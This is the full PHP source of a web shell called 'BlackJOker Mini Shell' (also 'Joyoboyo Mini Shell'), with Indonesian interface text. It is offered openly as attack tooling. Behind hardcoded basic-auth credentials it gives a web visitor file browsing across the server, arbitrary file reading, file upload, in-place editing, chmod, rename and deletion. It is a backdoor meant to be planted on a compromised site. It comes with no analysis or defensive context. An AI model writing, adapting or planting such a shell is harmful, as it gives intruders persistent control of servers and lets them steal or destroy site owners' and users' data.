./BlackJOker Mini Shell Atau Joyoboyo Mini Shell

1. <?php
2. // --- pop-up
3. $user = "sholah"; // user name
4. $pass = "ganteng"; // password
5.  
6. if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))
7.  
8. {
9.  
10. header("WWW-Authenticate: Basic realm=\"dvildance was here\"");
11.  
12. header("HTTP/1.0 401 Unauthorized");
13.  
14. exit();
15.  
16. }
17.  
18. // --- php shell
19. set_time_limit(0);
20. error_reporting(0);
21.  
22. if(get_magic_quotes_gpc()){
23. foreach($_POST as $key=>$value){
24. $_POST[$key] = stripslashes($value);
25. }
26. }
27. echo '<!DOCTYPE HTML>
28. <HTML>
29. <HEAD>
30. <link href="" rel="stylesheet" type="text/css">
31. <title>./BlackJOker Mini Shell</title>
32. <style>
33. body{
34. font-family: "Racing Sans One", cursive;
35. background-color: #e6e6e6;
36. text-shadow:0px 0px 1px #757575;
37. }
38. #content tr:hover{
39. background-color: #636263;
40. text-shadow:0px 0px 10px #fff;
41. }
42. #content .first{
43. background-color: silver;
44. }
45. #content .first:hover{
46. background-color: silver;
47. text-shadow:0px 0px 1px #757575;
48. }
49. table{
50. border: 1px #000000 dotted;
51. }
52. H1{
53. font-family: "Rye", cursive;
54. }
55. a{
56. color: #000;
57. text-decoration: none;
58. }
59. a:hover{
60. color: #fff;
61. text-shadow:0px 0px 10px #ffffff;
62. }
63. input,select,textarea{
64. border: 1px #000000 solid;
65. -moz-border-radius: 5px;
66. -webkit-border-radius:5px;
67. border-radius:5px;
68. }
69. </style>
70. </HEAD>
71. <BODY>
72. <H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
73. Joyoboyo Mini Shell <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
74. </center></H1>
75. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
76. <tr><td>Direktori : ';
77. if(isset($_GET['path'])){
78. $path = $_GET['path'];
79. }else{
80. $path = getcwd();
81. }
82. $path = str_replace('\\','/',$path);
83. $paths = explode('/',$path);
84.  
85. foreach($paths as $id=>$pat){
86. if($pat == '' && $id == 0){
87. $a = true;
88. echo '<a href="?path=/">/</a>';
89. continue;
90. }
91. if($pat == '') continue;
92. echo '<a href="?path=';
93. for($i=0;$i<=$id;$i++){
94. echo "$paths[$i]";
95. if($i != $id) echo "/";
96. }
97. echo '">'.$pat.'</a>/';
98. }
99. echo '</td></tr><tr><td>';
100. if(isset($_FILES['file'])){
101. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
102. echo '<font color="green">File Ter-Upload :* </font><br />';
103. }else{
104. echo '<font color="red">Upload gagal, Servernya kek <img src="http://c.fastcompany.net/asset_files/-/2014/11/11/4F4.gif"/>
105. </font><br />';
106. }
107. }
108. echo '<form enctype="multipart/form-data" method="POST">
109. Upload File : <input type="file" name="file" />
110. <input type="submit" value="upload" />
111. </form>
112. </td></tr>';
113. if(isset($_GET['filesrc'])){
114. echo "<tr><td>Current File : ";
115. echo $_GET['filesrc'];
116. echo '</tr></td></table><br />';
117. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
118. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
119. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
120. if($_POST['opt'] == 'chmod'){
121. if(isset($_POST['perm'])){
122. if(chmod($_POST['path'],$_POST['perm'])){
123. echo '<font color="green">Change Permission Done.</font><br />';
124. }else{
125. echo '<font color="red">Change Permission Error.</font><br />';
126. }
127. }
128. echo '<form method="POST">
129. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
130. <input type="hidden" name="path" value="'.$_POST['path'].'">
131. <input type="hidden" name="opt" value="chmod">
132. <input type="submit" value="Go" />
133. </form>';
134. }elseif($_POST['opt'] == 'rename'){
135. if(isset($_POST['newname'])){
136. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
137. echo '<font color="green">Change Name Done.</font><br />';
138. }else{
139. echo '<font color="red">Change Name Error.</font><br />';
140. }
141. $_POST['name'] = $_POST['newname'];
142. }
143. echo '<form method="POST">
144. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
145. <input type="hidden" name="path" value="'.$_POST['path'].'">
146. <input type="hidden" name="opt" value="rename">
147. <input type="submit" value="Go" />
148. </form>';
149. }elseif($_POST['opt'] == 'edit'){
150. if(isset($_POST['src'])){
151. $fp = fopen($_POST['path'],'w');
152. if(fwrite($fp,$_POST['src'])){
153. echo '<font color="green">Edit File Done ~_^.</font><br />';
154. }else{
155. echo '<font color="red">Edit File Error ~_~.</font><br />';
156. }
157. fclose($fp);
158. }
159. echo '<form method="POST">
160. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
161. <input type="hidden" name="path" value="'.$_POST['path'].'">
162. <input type="hidden" name="opt" value="edit">
163. <input type="submit" value="Go" />
164. </form>';
165. }
166. echo '</center>';
167. }else{
168. echo '</table><br /><center>';
169. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
170. if($_POST['type'] == 'dir'){
171. if(rmdir($_POST['path'])){
172. echo '<font color="green">Delete Dir Done.</font><br />';
173. }else{
174. echo '<font color="red">Delete Dir Error.</font><br />';
175. }
176. }elseif($_POST['type'] == 'file'){
177. if(unlink($_POST['path'])){
178. echo '<font color="green">Delete File Done.</font><br />';
179. }else{
180. echo '<font color="red">Delete File Error.</font><br />';
181. }
182. }
183. }
184. echo '</center>';
185. $scandir = scandir($path);
186. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
187. <tr class="first">
188. <td><center>Nama</center></td>
189. <td><center>Size</center></td>
190. <td><center>Status</center></td>
191. <td><center>Pilihan</center></td>
192. </tr>';
193.  
194. foreach($scandir as $dir){
195. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
196. echo "<tr>
197. <td><a href=\"?path=$path/$dir\">$dir</a></td>
198. <td><center>--</center></td>
199. <td><center>";
200. if(is_writable("$path/$dir")) echo '<font color="green">';
201. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
202. echo perms("$path/$dir");
203. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
204.  
205. echo "</center></td>
206. <td><center><form method=\"POST\" action=\"?option&path=$path\">
207. <select name=\"opt\">
208. <option value=\"\"></option>
209. <option value=\"delete\">Delete</option>
210. <option value=\"chmod\">Chmod</option>
211. <option value=\"rename\">Rename</option>
212. </select>
213. <input type=\"hidden\" name=\"type\" value=\"dir\">
214. <input type=\"hidden\" name=\"name\" value=\"$dir\">
215. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
216. <input type=\"submit\" value=\">\" />
217. </form></center></td>
218. </tr>";
219. }
220. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
221. foreach($scandir as $file){
222. if(!is_file("$path/$file")) continue;
223. $size = filesize("$path/$file")/1024;
224. $size = round($size,3);
225. if($size >= 1024){
226. $size = round($size/1024,2).' MB';
227. }else{
228. $size = $size.' KB';
229. }
230.  
231. echo "<tr>
232. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
233. <td><center>".$size."</center></td>
234. <td><center>";
235. if(is_writable("$path/$file")) echo '<font color="green">';
236. elseif(!is_readable("$path/$file")) echo '<font color="red">';
237. echo perms("$path/$file");
238. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
239. echo "</center></td>
240. <td><center><form method=\"POST\" action=\"?option&path=$path\">
241. <select name=\"opt\">
242. <option value=\"\"></option>
243. <option value=\"delete\">Delete</option>
244. <option value=\"chmod\">Chmod</option>
245. <option value=\"rename\">Rename</option>
246. <option value=\"edit\">Edit</option>
247. </select>
248. <input type=\"hidden\" name=\"type\" value=\"file\">
249. <input type=\"hidden\" name=\"name\" value=\"$file\">
250. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
251. <input type=\"submit\" value=\">\" />
252. </form></center></td>
253. </tr>";
254. }
255. echo '</table>
256. </div>';
257. }
258. echo '<center><br />./BlackJOker Mini Shell <font color="green">1.0</font></center>
259. </BODY>
260. </HTML>';
261. function perms($file){
262. $perms = fileperms($file);
263.  
264. if (($perms & 0xC000) == 0xC000) {
265. // Socket
266. $info = 's';
267. } elseif (($perms & 0xA000) == 0xA000) {
268. // Symbolic Link
269. $info = 'l';
270. } elseif (($perms & 0x8000) == 0x8000) {
271. // Regular
272. $info = '-';
273. } elseif (($perms & 0x6000) == 0x6000) {
274. // Block special
275. $info = 'b';
276. } elseif (($perms & 0x4000) == 0x4000) {
277. // Directory
278. $info = 'd';
279. } elseif (($perms & 0x2000) == 0x2000) {
280. // Character special
281. $info = 'c';
282. } elseif (($perms & 0x1000) == 0x1000) {
283. // FIFO pipe
284. $info = 'p';
285. } else {
286. // Unknown
287. $info = 'u';
288. }
289.  
290. // Owner
291. $info .= (($perms & 0x0100) ? 'r' : '-');
292. $info .= (($perms & 0x0080) ? 'w' : '-');
293. $info .= (($perms & 0x0040) ?
294. (($perms & 0x0800) ? 's' : 'x' ) :
295. (($perms & 0x0800) ? 'S' : '-'));
296.  
297. // Group
298. $info .= (($perms & 0x0020) ? 'r' : '-');
299. $info .= (($perms & 0x0010) ? 'w' : '-');
300. $info .= (($perms & 0x0008) ?
301. (($perms & 0x0400) ? 's' : 'x' ) :
302. (($perms & 0x0400) ? 'S' : '-'));
303.  
304. // World
305. $info .= (($perms & 0x0004) ? 'r' : '-');
306. $info .= (($perms & 0x0002) ? 'w' : '-');
307. $info .= (($perms & 0x0001) ?
308. (($perms & 0x0200) ? 't' : 'x' ) :
309. (($perms & 0x0200) ? 'T' : '-'));
310.  
311. return $info;
312. }